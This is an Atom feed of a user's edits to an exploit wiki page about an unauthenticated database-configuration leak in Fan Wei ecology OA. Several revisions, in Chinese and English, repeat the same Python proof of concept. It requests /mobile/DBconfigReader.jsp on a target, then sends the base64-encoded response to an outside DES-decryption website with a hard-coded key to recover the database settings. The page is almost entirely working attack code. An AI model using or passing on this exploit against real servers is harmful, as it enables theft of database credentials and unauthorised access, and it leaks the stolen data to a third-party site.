https://pwnwiki.com/api.php?action=feedcontributions&feedformat=atom&user=SuperDolby 2026-04-07T09:17:03Z User contributions MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=%E6%B3%9B%E5%BE%AEecology_OA%E6%95%B8%E6%93%9A%E5%BA%AB%E9%85%8D%E7%BD%AE%E4%BF%A1%E6%81%AF%E6%B4%A9%E9%9C%B2/zh-cn&diff=3916 2021-06-03T03:21:00Z

<p>SuperDolby: </p> <hr /> <div>&lt;languages /&gt;<br /> ==利用前提==<br /> /mobile/DBconfigReader.jsp 存在未授权访问<br /> <br /> ==POC==<br /> &lt;pre&gt;<br /> import base64<br /> import requests<br /> import ast<br /> <br /> def req(url):<br /> headers = {<br /> 'Content-Type':'application/x-www-form-urlencoded',<br /> 'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',<br /> 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',<br /> }<br /> <br /> r1 = requests.get(url,headers=headers).content<br /> s = r1.replace('\r\n','')<br /> res1 = base64.b64encode(s)<br /> <br /> postdata = {<br /> 'data':res1,<br /> 'type':'des',<br /> 'arg':'m=ecb_pad=zero_p=1z2x3c4v_o=0_s=gb2312_t=1'<br /> }<br /> u = 'http://tool.chacuo.net/cryptdes'<br /> r2 = requests.post(u,data=postdata,headers=headers).content<br /> res2 = ast.literal_eval(r2)<br /> <br /> return res2['data']<br /> <br /> url = 'http://58.2xxx:8888//mobile/DBconfigReader.jsp'<br /> print req(url)<br /> &lt;/pre&gt;</div>

SuperDolby https://pwnwiki.com/index.php?title=Translations:%E6%B3%9B%E5%BE%AEecology_OA%E6%95%B8%E6%93%9A%E5%BA%AB%E9%85%8D%E7%BD%AE%E4%BF%A1%E6%81%AF%E6%B4%A9%E9%9C%B2/1/zh-cn&diff=3915 2021-06-03T03:19:55Z

<p>SuperDolby: </p> <hr /> <div>==利用前提==<br /> /mobile/DBconfigReader.jsp 存在未授权访问</div>

SuperDolby https://pwnwiki.com/index.php?title=Translations:%E6%B3%9B%E5%BE%AEecology_OA%E6%95%B8%E6%93%9A%E5%BA%AB%E9%85%8D%E7%BD%AE%E4%BF%A1%E6%81%AF%E6%B4%A9%E9%9C%B2/Page_display_title/zh-cn&diff=3914 2021-06-03T03:19:16Z

<p>SuperDolby: </p> <hr /> <div>泛微ecology OA 数据库配置信息泄露</div>

SuperDolby https://pwnwiki.com/index.php?title=%E6%B3%9B%E5%BE%AEecology_OA%E6%95%B8%E6%93%9A%E5%BA%AB%E9%85%8D%E7%BD%AE%E4%BF%A1%E6%81%AF%E6%B4%A9%E9%9C%B2/en&diff=3913 2021-06-03T03:17:27Z

<p>SuperDolby: Created page with &quot;==Use premise== /mobile/DBconfigReader.jsp There is unauthorized access.&quot;</p> <hr /> <div>&lt;languages /&gt;<br /> ==Use premise==<br /> /mobile/DBconfigReader.jsp<br /> <br /> There is unauthorized access.<br /> <br /> ==POC==<br /> &lt;pre&gt;<br /> import base64<br /> import requests<br /> import ast<br /> <br /> def req(url):<br /> headers = {<br /> 'Content-Type':'application/x-www-form-urlencoded',<br /> 'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',<br /> 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',<br /> }<br /> <br /> r1 = requests.get(url,headers=headers).content<br /> s = r1.replace('\r\n','')<br /> res1 = base64.b64encode(s)<br /> <br /> postdata = {<br /> 'data':res1,<br /> 'type':'des',<br /> 'arg':'m=ecb_pad=zero_p=1z2x3c4v_o=0_s=gb2312_t=1'<br /> }<br /> u = 'http://tool.chacuo.net/cryptdes'<br /> r2 = requests.post(u,data=postdata,headers=headers).content<br /> res2 = ast.literal_eval(r2)<br /> <br /> return res2['data']<br /> <br /> url = 'http://58.2xxx:8888//mobile/DBconfigReader.jsp'<br /> print req(url)<br /> &lt;/pre&gt;</div>

SuperDolby https://pwnwiki.com/index.php?title=Translations:%E6%B3%9B%E5%BE%AEecology_OA%E6%95%B8%E6%93%9A%E5%BA%AB%E9%85%8D%E7%BD%AE%E4%BF%A1%E6%81%AF%E6%B4%A9%E9%9C%B2/1/en&diff=3912 2021-06-03T03:17:02Z

<p>SuperDolby: Created page with &quot;==Use premise== /mobile/DBconfigReader.jsp There is unauthorized access.&quot;</p> <hr /> <div>==Use premise==<br /> /mobile/DBconfigReader.jsp<br /> <br /> There is unauthorized access.</div>

SuperDolby https://pwnwiki.com/index.php?title=%E6%B3%9B%E5%BE%AEecology_OA%E6%95%B8%E6%93%9A%E5%BA%AB%E9%85%8D%E7%BD%AE%E4%BF%A1%E6%81%AF%E6%B4%A9%E9%9C%B2/en&diff=3911 2021-06-03T03:16:59Z

<p>SuperDolby: Created page with &quot;Fan Wei ecology OA database configuration information leaked&quot;</p> <hr /> <div>&lt;languages /&gt;<br /> &lt;div lang=&quot;chinese&quot; dir=&quot;ltr&quot; class=&quot;mw-content-ltr&quot;&gt;<br /> ==利用前提==<br /> /mobile/DBconfigReader.jsp存在未授權訪問。<br /> &lt;/div&gt;<br /> <br /> ==POC==<br /> &lt;pre&gt;<br /> import base64<br /> import requests<br /> import ast<br /> <br /> def req(url):<br /> headers = {<br /> 'Content-Type':'application/x-www-form-urlencoded',<br /> 'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',<br /> 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',<br /> }<br /> <br /> r1 = requests.get(url,headers=headers).content<br /> s = r1.replace('\r\n','')<br /> res1 = base64.b64encode(s)<br /> <br /> postdata = {<br /> 'data':res1,<br /> 'type':'des',<br /> 'arg':'m=ecb_pad=zero_p=1z2x3c4v_o=0_s=gb2312_t=1'<br /> }<br /> u = 'http://tool.chacuo.net/cryptdes'<br /> r2 = requests.post(u,data=postdata,headers=headers).content<br /> res2 = ast.literal_eval(r2)<br /> <br /> return res2['data']<br /> <br /> url = 'http://58.2xxx:8888//mobile/DBconfigReader.jsp'<br /> print req(url)<br /> &lt;/pre&gt;</div>

SuperDolby https://pwnwiki.com/index.php?title=Translations:%E6%B3%9B%E5%BE%AEecology_OA%E6%95%B8%E6%93%9A%E5%BA%AB%E9%85%8D%E7%BD%AE%E4%BF%A1%E6%81%AF%E6%B4%A9%E9%9C%B2/Page_display_title/en&diff=3910 2021-06-03T03:16:40Z

<p>SuperDolby: Created page with &quot;Fan Wei ecology OA database configuration information leaked&quot;</p> <hr /> <div>Fan Wei ecology OA database configuration information leaked</div>

SuperDolby https://pwnwiki.com/index.php?title=Translations:%E6%B3%9B%E5%BE%AEecology_OA%E6%95%B8%E6%93%9A%E5%BA%AB%E9%85%8D%E7%BD%AE%E4%BF%A1%E6%81%AF%E6%B4%A9%E9%9C%B2/Page_display_title/zh-cn&diff=3909 2021-06-03T03:13:37Z

<p>SuperDolby: Created page with &quot;Fan Wei ecology OA database configuration information leakage&quot;</p> <hr /> <div>Fan Wei ecology OA database configuration information leakage</div>

SuperDolby https://pwnwiki.com/index.php?title=%E6%B3%9B%E5%BE%AEecology_OA%E6%95%B8%E6%93%9A%E5%BA%AB%E9%85%8D%E7%BD%AE%E4%BF%A1%E6%81%AF%E6%B4%A9%E9%9C%B2/zh-cn&diff=3908 2021-06-03T03:13:31Z

<p>SuperDolby: Created page with &quot;==Use premise== /mobile/DBconfigReader.jsp There is unauthorized access.&quot;</p> <hr /> <div>&lt;languages /&gt;<br /> ==Use premise==<br /> /mobile/DBconfigReader.jsp There is unauthorized access.<br /> <br /> ==POC==<br /> &lt;pre&gt;<br /> import base64<br /> import requests<br /> import ast<br /> <br /> def req(url):<br /> headers = {<br /> 'Content-Type':'application/x-www-form-urlencoded',<br /> 'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',<br /> 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',<br /> }<br /> <br /> r1 = requests.get(url,headers=headers).content<br /> s = r1.replace('\r\n','')<br /> res1 = base64.b64encode(s)<br /> <br /> postdata = {<br /> 'data':res1,<br /> 'type':'des',<br /> 'arg':'m=ecb_pad=zero_p=1z2x3c4v_o=0_s=gb2312_t=1'<br /> }<br /> u = 'http://tool.chacuo.net/cryptdes'<br /> r2 = requests.post(u,data=postdata,headers=headers).content<br /> res2 = ast.literal_eval(r2)<br /> <br /> return res2['data']<br /> <br /> url = 'http://58.2xxx:8888//mobile/DBconfigReader.jsp'<br /> print req(url)<br /> &lt;/pre&gt;</div>

SuperDolby https://pwnwiki.com/index.php?title=Translations:%E6%B3%9B%E5%BE%AEecology_OA%E6%95%B8%E6%93%9A%E5%BA%AB%E9%85%8D%E7%BD%AE%E4%BF%A1%E6%81%AF%E6%B4%A9%E9%9C%B2/1/zh-cn&diff=3907 2021-06-03T03:13:08Z

<p>SuperDolby: Created page with &quot;==Use premise== /mobile/DBconfigReader.jsp There is unauthorized access.&quot;</p> <hr /> <div>==Use premise==<br /> /mobile/DBconfigReader.jsp There is unauthorized access.</div>

SuperDolby